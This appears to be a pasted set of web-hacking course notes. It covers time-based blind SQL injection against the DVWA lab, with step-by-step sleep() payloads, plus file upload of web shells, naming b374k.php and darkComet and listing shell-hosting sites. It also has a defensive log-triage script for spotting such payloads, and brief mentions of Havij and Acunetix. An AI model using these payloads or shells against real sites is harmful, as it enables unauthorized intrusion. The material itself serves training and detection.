Mukezh

Session Time Based SQL Injection

Apr 2nd, 2019
Time Based SQL Injection
========================
Time Based SQL Injection is a subcategory of Blind SQL Injection. It is often used to extract data when there is no other way to retrieve it from the database: the injected query creates a time delay if the query is right, and the result is inferred from the time it takes to get the server response. As you can guess, this type of inference approach is particularly useful for blind injection attacks. It basically works by using queries that delay the response.

We basically use functions such as:
sleep()
delay()
hibernate()

Basic syntax
select if(expression,true,false)


Steps while performing time based injection in DVWA:

Step 1: 1 --> result
Step 2: 1' --> no result
Step 3: 1' - sleep(3) #
Step 4: 1' - if(mid(version(),1,1)='5', sleep(3),0) #
Step 5: 1' - if(mid(version(),1,1)='4', sleep(3),0) #
Step 6: 1' - if(mid(version(),1,1)='3', sleep(3),0) #
Step 7: 1' - if(mid(version(),1,1)='2', sleep(3),0) #
Step 8: 1' - if(mid(version(),1,1)='1', sleep(3),0) #

Here the mid() function is used in the same way as substr(), i.e.
mid(string, starting point, length we want to extract)

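A defender's view of the steps above, as an added example that is not part of the original notes: it parses access-log lines, flags parameters carrying a delay call, and uses the response time to tell probes from executed injections and to recover which conditions the database answered as true. The log format, the /sqli_blind/ path and the function names are assumptions made for this illustration; it also matches PostgreSQL's pg_sleep(), which goes beyond the MySQL case in the notes.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Delay calls used for time-based blind injection (MySQL sleep, PostgreSQL pg_sleep).
DELAY = re.compile(r"\b(sleep|pg_sleep)\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)
# if(<condition>, sleep(n), ...): the condition is the yes/no question being asked.
CONDITION = re.compile(r"\bif\s*\(\s*(.+?)\s*,\s*(?:pg_)?sleep\s*\(", re.I)
# Assumed log format for this example: METHOD URL STATUS SECONDS
LINE = re.compile(r"^(\S+) (\S+) (\d{3}) (\d+(?:\.\d+)?)$")

def classify(line):
    """Return a finding for a log line whose parameters carry a delay call, else None."""
    m = LINE.match(line.strip())
    if not m:
        return None
    elapsed = float(m.group(4))
    for name, value in parse_qsl(urlsplit(m.group(2)).query, keep_blank_values=True):
        d = DELAY.search(value)
        if not d:
            continue
        c = CONDITION.search(value)
        # Response no faster than the requested delay: the database ran the injected call.
        executed = elapsed >= float(d.group(2))
        return {"param": name, "delay": float(d.group(2)), "elapsed": elapsed,
                "executed": executed, "condition": c.group(1) if c else None}
    return None

def triage(lines):
    """Summarise a batch: injectable parameters and conditions answered 'true'."""
    findings = [f for f in map(classify, lines) if f]
    return {
        "probes": len(findings),
        "injectable": sorted({f["param"] for f in findings if f["executed"]}),
        "disclosed": [f["condition"] for f in findings
                      if f["executed"] and f["condition"]],
    }

# Constructed sample lines; the id values are the URL-encoded steps 1, 3, 4 and 5.
SAMPLE = [
    "GET /sqli_blind/?id=1&Submit=Submit 200 0.021",
    "GET /sqli_blind/?id=1%27+-+sleep%283%29+%23&Submit=Submit 200 3.044",
    "GET /sqli_blind/?id=1%27+-+if%28mid%28version%28%29%2C1%2C1%29%3D%275%27"
    "%2C+sleep%283%29%2C0%29+%23&Submit=Submit 200 3.038",
    "GET /sqli_blind/?id=1%27+-+if%28mid%28version%28%29%2C1%2C1%29%3D%274%27"
    "%2C+sleep%283%29%2C0%29+%23&Submit=Submit 200 0.019",
]

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Latency alone is a heuristic: compare against the endpoint's normal response time before treating a slow reply as proof of execution.
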
=x=x=x=x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x==x=x=x=x=x=x==x=x=x=x==x=x=x==x=x=x=x==x

Arbitrary File Upload
=====================
Arbitrary File Upload occurs when the web application asks you to input or upload some kind of document, but instead the person uploads some kind of malicious file, such as darkComet.exe or b374k.php.


Some shells can be found on the following websites:
webshell.co
privshell.com

Useful scripts:
1. b374k.php
2. Dhanush.php
3. pouya.asp


=x=x=x=x==x=x=x=x=x=x=x=x==x=x==x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x==x

POST PARAMETER INJECTION
==========================
POST Parameter Injection is the attack vector in which we tamper with and manipulate POST parameters and HTTP headers through tools like Tamper Data, Burp Suite, etc.
First we have to capture the parameters in the HTTP packets moving from a browser to a web server.



=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x


Havij: An automated tool based on a GUI (Graphical User Interface)

Demo...



------------------------------------------------------------------------------------------

Acunetix - Web Vulnerability Scanner
==========

Doing a VAPT on a website requires a lot of effort, so in order to save time there are several tools which automate various types of scans and even generate a report.
Acunetix is one of the software packages that helps in doing the same.

DEMO....